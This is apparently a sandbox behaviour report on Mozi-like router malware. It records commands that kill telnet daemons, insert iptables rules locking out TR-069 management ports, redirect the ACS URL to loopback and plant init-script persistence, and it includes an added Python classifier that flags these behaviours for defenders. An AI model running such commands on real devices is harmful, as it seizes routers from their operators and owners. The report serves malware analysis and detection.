Source: /usr/bin/killall (PID: 5255) File opened: /proc/1900/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/22/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/23/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/24/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/25/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/26/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/27/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/28/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/29/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/491/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/250/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/130/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/251/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/252/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/132/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/253/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/254/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/255/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/256/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1599/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/257/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1477/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/379/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/258/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1476/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/259/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1475/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/936/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/30/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/2208/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/35/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/5177/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/5178/stat Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /usr/networks (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5253) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5277) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5284) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5287) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5292) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5295) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5298) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5301) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5304) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5310) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5313) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5316) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5319) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5322) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5324) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5326) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5331) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5334) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5337) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5340) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5343) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5346) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5349) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5352) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5355) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5359) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5362) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5398) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 15453 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5401) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 15453 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5404) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 15453 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5407) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 15453 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5410) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 15453 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5413) Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 15453 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5416) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 15453 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5419) Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 15453 -j ACCEPT" Jump to behavior
Source: /usr/bin/dash (PID: 5196) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.dvcVrUcqjW /tmp/tmp.b2DlyODsJX /tmp/tmp.FBXdssB42e Jump to behavior
Source: submitted sample Stderr:
    telnetd: no process found
    utelnetd: no process found
    scfgmgr: no process found
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    /bin/sh: 1: cfgtool: not found
    /bin/sh: 1: cfgtool: not found
    Unsupported ioctl: cmd=0xffffffff80045705
    qemu: uncaught target signal 4 (Illegal instruction) - core dumped
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    Unsupported ioctl: cmd=0xffffffff80045705
    : exit code = 0
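Read as a sequence, the shell commands above form one procedure: the sample kills the device's telnet daemons (telnetd, utelnetd, scfgmgr), opens its own TCP port 42337 and UDP port 15453 in the INPUT, OUTPUT and nat PREROUTING/POSTROUTING chains, drops traffic to TCP 7547 (the TR-069/CWMP connection-request port) and to 35000, 50023 and 58000, and rewrites the CPE's ManagementServer URL to http://127.0.0.1 with the connection-request password "acsMozi", so that the operator's ACS can no longer reach the router while the bot's own listener stays reachable. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it parses behaviour lines of the form shown above (a handful copied from the report, trailing link text stripped) and classifies them into lock-out, port-opening, ACS-hijack, service-kill and persistence findings. The set MANAGEMENT_PORTS is an assumption: 7547 is the CWMP port, the other three are treated as management ports only because the sample chooses to block them.

```python
"""Classify sandbox behaviour lines (added example, not from the report).

Parses "Shell command executed" and "File:" lines and flags firewall
lock-out of management ports, opening of non-standard ports, TR-069 (CWMP)
ACS hijacking, service killing and System V init-script persistence.
"""
import re
from typing import Dict, List, Tuple

# TCP 7547 is the TR-069/CWMP connection-request port. 35000, 50023 and 58000
# are ASSUMED to be vendor management ports purely because the sample DROPs
# them; adjust this set for the devices you actually monitor.
MANAGEMENT_PORTS = {7547, 35000, 50023, 58000}
# Directories whose scripts run at boot on System V style embedded devices.
PERSIST_DIRS = ("/etc/init.d/", "/etc/rcS.d/", "/etc/rc.d/")

CMD_RE = re.compile(r'Shell command executed: /bin/sh -c "(?P<cmd>.*)"$')
FILE_RE = re.compile(r"File: (?P<path>\S+) \(bits: (?P<bits>[^)]*)\)")
IPT_RE = re.compile(
    r"iptables -I (?P<chain>\w+)(?: -t (?P<table>\w+))? -p (?P<proto>tcp|udp) "
    r"--(?:destination-port|dport|source-port|sport) (?P<port>\d+) -j (?P<target>ACCEPT|DROP)"
)
# cfgtool writes the CWMP ManagementServer subtree; values are \"-quoted in the log.
ACS_RE = re.compile(r'ManagementServer (?P<param>\w+) \\?"(?P<value>[^"\\]*)')
KILL_RE = re.compile(r"killall(?: -\d+)? (?P<procs>.+)")

Finding = Tuple[str, str]  # (category, detail)

# Constructed sample: behaviour lines copied from the report above.
SAMPLE_LOG = r"""
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5253) Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5277) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5287) Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 42337 -j ACCEPT" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5310) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5322) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5324) Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\"" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5342) Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP" Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5398) Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 15453 -j ACCEPT" Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1477/stat Jump to behavior
"""


def analyse_command(cmd: str) -> List[Finding]:
    """Classify one shell command string from a 'Shell command executed' line."""
    out: List[Finding] = []
    m = IPT_RE.search(cmd)
    if m:
        port, proto, chain = int(m.group("port")), m.group("proto"), m.group("chain")
        if m.group("target") == "DROP" and port in MANAGEMENT_PORTS:
            out.append(("mgmt_lockout", f"{proto}/{port} dropped in {chain}"))
        elif m.group("target") == "ACCEPT":
            out.append(("port_opened", f"{proto}/{port} accepted in {chain}"))
        return out
    m = ACS_RE.search(cmd)
    if m:
        param, value = m.group("param"), m.group("value")
        if param == "URL" and ("127.0.0.1" in value or "localhost" in value):
            out.append(("acs_hijack", f"ManagementServer URL set to loopback: {value}"))
        elif param == "ConnectionRequestPassword":
            out.append(("acs_hijack", "ConnectionRequestPassword changed"))
        return out
    m = KILL_RE.search(cmd)
    if m:
        out.append(("service_kill", m.group("procs")))
    return out


def analyse_file(path: str, bits: str) -> List[Finding]:
    """Flag boot-time scripts and files left writable by everyone."""
    out: List[Finding] = []
    if path.startswith(PERSIST_DIRS):
        out.append(("persistence", f"init script written: {path}"))
    if re.search(r"all: \w*w", bits):  # 'all' (other) has the write bit
        out.append(("world_writable", f"{path} ({bits})"))
    return out


def analyse_log(text: str) -> List[Finding]:
    """Run every line of a behaviour log through the classifiers above."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = re.sub(r"\s+Jump to .*$", "", raw)  # drop report link text
        m = CMD_RE.search(line)
        if m:
            findings.extend(analyse_command(m.group("cmd")))
            continue
        m = FILE_RE.search(line)
        if m:
            findings.extend(analyse_file(m.group("path"), m.group("bits")))
    return findings


def summarise(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for category, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


if __name__ == "__main__":
    for category, detail in analyse_log(SAMPLE_LOG):
        print(f"{category:15} {detail}")
    print(summarise(analyse_log(SAMPLE_LOG)))
```

The same classifier can be pointed at a live device's process-exec audit log; the combination of a mgmt_lockout finding with an acs_hijack finding is the signal worth alerting on, since an administrator hardening a CPE would not also redirect its ACS to loopback.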

Hooking and other Techniques for Hiding and Protection

Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/init.d/keyboard-setup.sh Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/init.d/console-setup.sh Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /usr/bin/rescan-scsi-bus.sh Jump to dropped file
Source: unknown Network traffic detected: HTTP traffic on port 52454 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 81 -> 52454
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 37800 -> 7574
Source: unknown Network traffic detected: HTTP traffic on port 7574 -> 37800
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 46902 -> 5555
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 37178 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 8443 -> 37178
Source: unknown Network traffic detected: HTTP traffic on port 49428 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 47424 -> 49152
Source: unknown Network traffic detected: HTTP traffic on port 49152 -> 47424

Malware Analysis System Evasion

Source: /tmp/ZFvtIZszMd (PID: 5247) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5260) Queries kernel information via 'uname': Jump to behavior
Source: ZFvtIZszMd, 5247.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/ZFvtIZszMdSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/ZFvtIZszMd
Source: kvm-test-1-run.sh.30.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm-test-1-run.sh.30.dr Binary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
Source: functions.sh2.30.dr Binary or memory string: qemu-system-ppc64)
Source: kvm.sh.30.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.30.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: kvm-test-1-run.sh.30.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: kvm-test-1-run.sh.30.dr Binary or memory string: echo Monitoring qemu job at yet-as-unknown pid
Source: kvm.sh.30.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh2.30.dr Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.30.dr Binary or memory string: QEMU="`identify_qemu vmlinux`"
Source: kvm-test-1-run.sh.30.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
Source: ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp Binary or memory string: ~qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.30.dr Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.30.dr Binary or memory string: identify_qemu_args () {
Source: functions.sh2.30.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.30.dr Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.30.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh2.30.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.30.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: ZFvtIZszMd, 5247.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000fe9232f0.000000009560e333.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.30.dr Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: functions.sh2.30.dr Binary or memory string: echo qemu-system-ppc64
Source: functions.sh2.30.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: functions.sh2.30.dr Binary or memory string: echo qemu-system-aarch64
Source: kvm-recheck-rcu.sh.30.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.30.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm.sh.30.dr Binary or memory string: print "needqemurun="
Source: functions.sh2.30.dr Binary or memory string: identify_qemu_vcpus () {
Source: kvm-test-1-run.sh.30.dr Binary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
Source: kvm-test-1-run.sh.30.dr Binary or memory string: if test -z "$qemu_pid" || kill -0 "$qemu_pid" > /dev/null 2>&1
Source: kvm.sh.30.dr Binary or memory string: print "\tneedqemurun=1"
Source: kvm-test-1-run.sh.30.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
Source: kvm-test-1-run.sh.30.dr Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.30.dr Binary or memory string: # Generate qemu -append arguments
Source: ZFvtIZszMd, 5247.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: ZFvtIZszMd, 5268.1.00000000cdc52344.000000009e1c7e8b.rw-.sdmp Binary or memory string: qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: functions.sh2.30.dr Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.30.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: kvm.sh.30.dr Binary or memory string: print "if test -n \"$needqemurun\""
Source: functions.sh2.30.dr Binary or memory string: echo qemu-system-i386
Source: functions.sh2.30.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh2.30.dr Binary or memory string: echo qemu-system-x86_64
Source: functions.sh2.30.dr Binary or memory string: identify_qemu () {
Source: parse-console.sh.30.dr Binary or memory string: print_warning Console output contains nul bytes, old qemu still running?
Source: kvm-test-1-run.sh.30.dr Binary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
Source: kvm-test-1-run.sh.30.dr Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh2.30.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: functions.sh2.30.dr Binary or memory string: qemu-system-aarch64)
Source: kvm.sh.30.dr Binary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
Source: kvm-test-1-run.sh.30.dr Binary or memory string: echo Unknown PID, cannot kill qemu command
Source: kvm-recheck-lock.sh.30.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.30.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-test-1-run.sh.30.dr Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: functions.sh2.30.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm-test-1-run.sh.30.dr Binary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: functions.sh2.30.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386|qemu-system-aarch64)
Source: kvm-test-1-run.sh.30.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh2.30.dr Binary or memory string: qemu-system-x86_64)
Source: functions.sh2.30.dr Binary or memory string: qemu-system-aarch64)
Source: functions.sh2.30.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: functions.sh2.30.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.30.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.30.dr Binary or memory string: qemu_pid=""
Source: kvm-test-1-run.sh.30.dr Binary or memory string: elif test -z "$qemu_pid"
Source: functions.sh2.30.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: ZFvtIZszMd, 5247.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5249.1.00000000fe9232f0.000000009560e333.rw-.sdmp, ZFvtIZszMd, 5268.1.00000000fe9232f0.000000009560e333.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.30.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.30.dr Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.30.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: kvm.sh.30.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: functions.sh2.30.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_MEM=$2
Source: kvm-test-1-run.sh.30.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh2.30.dr Binary or memory string: specify_qemu_cpus () {
Source: functions.sh2.30.dr Binary or memory string: qemu-system-i386)
Source: functions.sh2.30.dr Binary or memory string: qemu-system-ppc64)
Source: functions.sh2.30.dr Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm.sh.30.dr Binary or memory string: print "needqemurun="
Source: functions.sh2.30.dr Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh2.30.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh2.30.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: kvm-test-1-run.sh.30.dr Binary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
Source: functions.sh2.30.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh2.30.dr Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh2.30.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh2.30.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: kvm.sh.30.dr Binary or memory string: --qemu-cmd)
Source: functions.sh2.30.dr Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.30.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.30.dr Binary or memory string: qemu_args="-enable-kvm -nographic $qemu_args"
